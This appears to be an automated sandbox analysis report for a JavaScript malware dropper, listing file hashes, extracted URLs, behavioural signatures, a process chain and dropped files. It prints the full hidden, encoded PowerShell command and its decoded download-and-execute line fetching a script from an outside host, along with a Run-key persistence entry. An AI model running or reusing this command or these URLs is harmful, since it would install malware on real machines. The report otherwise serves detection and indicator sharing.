Analysis
Max time kernel: 31s
Max time network: 34s
Platform: windows7_x64
Resource: win7-20230220-en
Resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
Submitted: 17/05/2023, 10:19

Static task: static1
Behavioral task: behavioral1
  Sample: doc4978316.js
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: doc4978316.js
  Resource: win10v2004-20230220-en
General
Target: doc4978316.js
Size: 35KB
MD5: c21cf0ea00b1fd7e53fa14b55dd1be82
SHA1: aff249ddfc8d8fac75d0bf040579cf32e0d50e2a
SHA256: c9e6dc44db59f1883e850babac21890e5723d2627a623c47f709e3bb7d073e35
SHA512: 82e4004f78f1aef5dfd1ae83b6dec4422e0960d15b6bb5f845ae7af13617fa9349046ce74be0b893de2e139ee6c93106048f0f2be70199d6567095c14d1ae618
SSDEEP: 384:Wj9safdV7zZ/iRRil5Vxy67U2j0etD/1qQMmFcDpOlkjQSHnY4bvwn3QmvCBHx5H:WCWZERq02j0I/1YH9gSRvww7EjzG1
Malware Config
Extracted: https://birikina.it/files/f1.ps1
Extracted: https://alnama.net/realty/license.php
Signatures

Blocklisted process makes network request (3 IoCs)
flow  pid   Process
4     1980  powershell.exe
6     1980  powershell.exe
8     1980  powershell.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate_5977 = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate_5977\\client32.exe"
Process: powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid   Process
1980  powershell.exe
1944  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description              pid   Process
Token: SeDebugPrivilege  1980  powershell.exe
Token: SeDebugPrivilege  1944  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs; each spawn is recorded as three writes)
description                        pid   Process         procid_target
PID 2040 wrote to memory of 2004   2040  wscript.exe     28
PID 2040 wrote to memory of 2004   2040  wscript.exe     28
PID 2040 wrote to memory of 2004   2040  wscript.exe     28
PID 2004 wrote to memory of 1980   2004  cmd.exe         30
PID 2004 wrote to memory of 1980   2004  cmd.exe         30
PID 2004 wrote to memory of 1980   2004  cmd.exe         30
PID 1980 wrote to memory of 1944   1980  powershell.exe  31
PID 1980 wrote to memory of 1944   1980  powershell.exe  31
PID 1980 wrote to memory of 1944   1980  powershell.exe  31
Processes

Chain: wscript.exe (doc4978316.js) spawns cmd.exe, which launches a hidden, encoded powershell.exe (stage 1, fetches f1.ps1 from birikina.it), which in turn launches a second encoded powershell.exe (stage 2, writes the Run key).

C:\Windows\system32\wscript.exe  (PID 2040)
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\doc4978316.js
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 2004)
    command line: "C:\Windows\System32\cmd.exe" /c PoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1980)
      command line: PoWersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAcgBpAGsAaQBuAGEALgBpAHQALwBmAGkAbABlAHMALwBmADEALgBwAHMAMQAiACkA
      decoded -enc payload (base64 over UTF-16LE): IEX (New-Object Net.Webclient).downloadstring("https://birikina.it/files/f1.ps1")
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1944)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc 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
        (the stage-2 encoded payload is not preserved in this report)
        - Adds Run key to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 62KB
MD5: 3ac860860707baaf32469fa7cc7c0192
SHA1: c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256: d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512: d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 8ca48ff8ff2696ce523d56574a09d854
SHA1: c170f3a13e46cac6a4eff938c9406e77ef63bde3
SHA256: 34ed9defe71b323c8c3624dfe36052bcd98124e9acfcc5872d9c839015779111
SHA512: adeeb4095fc98eae44cfa4bd6ca66ef48d81bddab287b80c8c1f581fa87c51678d73166fcfb1573536326ac3cae9f3582266918b3ba495b9fb136a9e49f18e31

Filesize: 61KB
MD5: fc4666cbca561e864e7fdf883a9e6661
SHA1: 2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5
SHA256: 10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b
SHA512: c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Filesize: 164KB
MD5: 4ff65ad929cd9a367680e0e5b1c08166
SHA1: c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256: c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512: f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 47f6cabe54656efbb47f1961003b70a2
SHA1: 94b5612ee5378808583d7b09713caefbdb87448b
SHA256: e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9
SHA512: da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W7RNLN0H5FK2DRBIZA5V.temp
Filesize: 7KB
MD5: 47f6cabe54656efbb47f1961003b70a2
SHA1: 94b5612ee5378808583d7b09713caefbdb87448b
SHA256: e1cd9d9429519e2bef8f713f05dcd91264ef8fe5a83c6b22a1e48ff287ca53c9
SHA512: da38cd745f7fbd2f1e7032d51efcf50cafc8d68b292aa616b6023082880eec6f453fd217a786d272131b0c7ecfcbd0281fa200e632c91a32096b161f7c798ccc